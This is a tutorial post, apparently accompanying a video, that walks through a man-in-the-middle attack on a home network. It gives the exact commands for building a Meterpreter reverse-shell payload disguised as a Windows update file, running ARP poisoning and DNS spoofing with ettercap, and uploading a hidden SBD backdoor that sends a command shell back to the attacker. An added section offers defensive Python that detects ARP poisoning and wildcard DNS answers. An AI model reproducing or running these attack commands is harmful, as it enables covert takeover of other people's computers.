Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2319124
Download video: http://www.mediafire.com/download.php?ml5lto4ykyq
Commands: http://pastebin.com/f6f4a936


What is this?
By setting up a fake web site, we social engineer our target into running our exploit. The end result gives us command line access to our target's PC.


How does this work?

> Ettercap to do the MITM Attack
> Metasploit for the exploit
> Secure BackDoor (SBD) for the backdoor
> Apache for the web server


What do I need?
> Ettercap
> Metasploit
> A web server
> SBD (optional)
*All of this is on BackTrack 4*


Network Setup:
Attacker's IP: 192.168.1.104
Target's IP: 192.168.1.101
Gateway IP: 192.168.1.1


Software
Name: Ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net
Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download

Name: Metasploit
Version: 3.3
Home Page: http://www.metasploit.com/
Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download

Name: SBD
Version: 1.36
Home Page: http://tigerteam.se
Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download
Source: http://www2.packetstormsecurity.org/...earchvalue=sbd


Commands:
Code:
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 X > /var/www/Windows-KB183905-x86-ENU.exe
kate /var/www/index.html
>*Replace filename with new one, Windows-KB183905-x86-ENU.exe*
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.104
exploit

cd /usr/share/ettercap/
mv -f etter.dns etter.dns.old
kate etter.dns
> * A 192.168.1.104
ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.1.1/ /192.168.1.101/

upload /root/tools/backdoors/sbd-1.36/sbd.exe C:/
execute -H -f "C:/sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 192.168.1.104"

wine /root/tools/backdoors/sbd-1.36/sbd.exe -l -k g0tmi1k -p 7332
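
Seen from the target's side, the ARP poisoning and the wildcard `* A` DNS entry above leave two traces: the gateway's IP shares a MAC address with another host, and unrelated domain names all resolve to one private address. The following is an added example (not part of the original post) that checks for both; the MAC addresses, hostnames and function names are constructed for illustration, and the IPs come from the Network Setup section.

```python
import ipaddress
from collections import defaultdict

# Constructed sample data: `arp -an` style cache and observed DNS A answers.
# MAC addresses and hostnames are invented; IPs follow the Network Setup above.
ARP_CACHE = """\
? (192.168.1.1) at 00:11:22:aa:bb:04 [ether] on wlan0
? (192.168.1.104) at 00:11:22:aa:bb:04 [ether] on wlan0
? (192.168.1.50) at 00:11:22:aa:bb:50 [ether] on wlan0
"""
DNS_ANSWERS = [  # (queried name, A record returned)
    ("www.example.com", "192.168.1.104"),
    ("mail.example.org", "192.168.1.104"),
    ("update.example.net", "192.168.1.104"),
    ("intranet.example.lan", "192.168.1.20"),
]

def arp_conflicts(arp_output, gateway):
    """Return the other IPs that share the gateway's MAC (ARP poisoning sign)."""
    by_mac = defaultdict(set)
    for line in arp_output.splitlines():
        parts = line.split()
        # Expected shape: ? (IP) at MAC [ether] on IFACE; skip <incomplete> rows
        if len(parts) >= 4 and parts[2] == "at" and ":" in parts[3]:
            by_mac[parts[3].lower()].add(parts[1].strip("()"))
    for ips in by_mac.values():
        if gateway in ips and len(ips) > 1:
            return sorted(ips - {gateway})
    return []

def wildcard_answers(answers, min_names=3):
    """Return private IPs answering for min_names or more unrelated domains."""
    domains = defaultdict(set)
    for name, ip in answers:
        if ipaddress.ip_address(ip).is_private:
            # Group by the last two labels so subdomains of one site count once
            domains[ip].add(".".join(name.lower().rstrip(".").split(".")[-2:]))
    return sorted(ip for ip, d in domains.items() if len(d) >= min_names)

if __name__ == "__main__":
    print("shares gateway MAC:", arp_conflicts(ARP_CACHE, "192.168.1.1"))
    print("answers for unrelated names:", wildcard_answers(DNS_ANSWERS))
```

A static ARP entry for the gateway on the client, or dynamic ARP inspection on the switch, prevents the first condition from arising at all.
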
Notes:
Sorry for the poor video editing on this one - it is cut from a final video called "g0tmi1k's home network" which is still incomplete.

Video length: 06:57
Capture length: 7:40
Song: Mr. Scruff - Is He Ready, Mr. Scruff - Get a Move On

Blog Post: http://g0tmi1k.blogspot.com/2009/07/videotutorial-man-in-middle-mitm-attack.html
Forum Post: http://forums.remote-exploit.org/bt4-videos/27173-video-man-middle-mitm-attack-ettercap-metasploit-sbd.html



~g0tmi1k